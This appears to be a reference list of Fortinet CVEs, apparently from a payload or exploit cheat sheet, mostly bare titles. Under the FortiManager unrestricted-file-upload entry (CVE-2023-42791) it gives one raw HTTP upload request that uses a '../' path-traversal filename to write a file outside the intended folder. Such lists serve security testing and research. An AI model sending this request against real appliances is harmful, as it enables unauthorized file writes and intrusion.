CVE-2024-55591 - FortiOS Authentication Bypass Vulnerable
CVE-2024-47575 - Fortimanager - Fortijump, Unauthenticated Remote Code Execution
CVE-2024-23666 - FortiManager - Insufficient authorization checks
CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection
CVE-2024-21762 - FortiGate RCE
CVE-2023-48788 Fortinet FortiClient EMS SQL Injection Vulnerabilitiy
CVE-2023-42791 - FortiManager - Unrestricted File Upload
POST /flatui/api/gui/upload HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=---------------------------26433208534746453103032271192
Content-Length: 729
[...]
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="folder"
upload
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filesize"
5
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filename"
../../../../../test.txt
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="range"
0-5
-----------------------------26433208534746453103032271192
Content-Disposition: form-data; name="filepath"; filename="system.dat"
Content-Type: application/octet-stream
test
-----------------------------26433208534746453103032271192--
CVE-2023-27997 - FortiGate SSL-VPN
CVE-2022-40684 - Fortinet FortiOS, FortiProxy, and FortiSwitchManager
CVE-2022-39952 - Fortinet FortiNAC
CVE-2021-26088 - Improper Authentication in Fortinet Fortinet Single Sign-On
CVE-2018-13379 - FortiGate SSL-VPN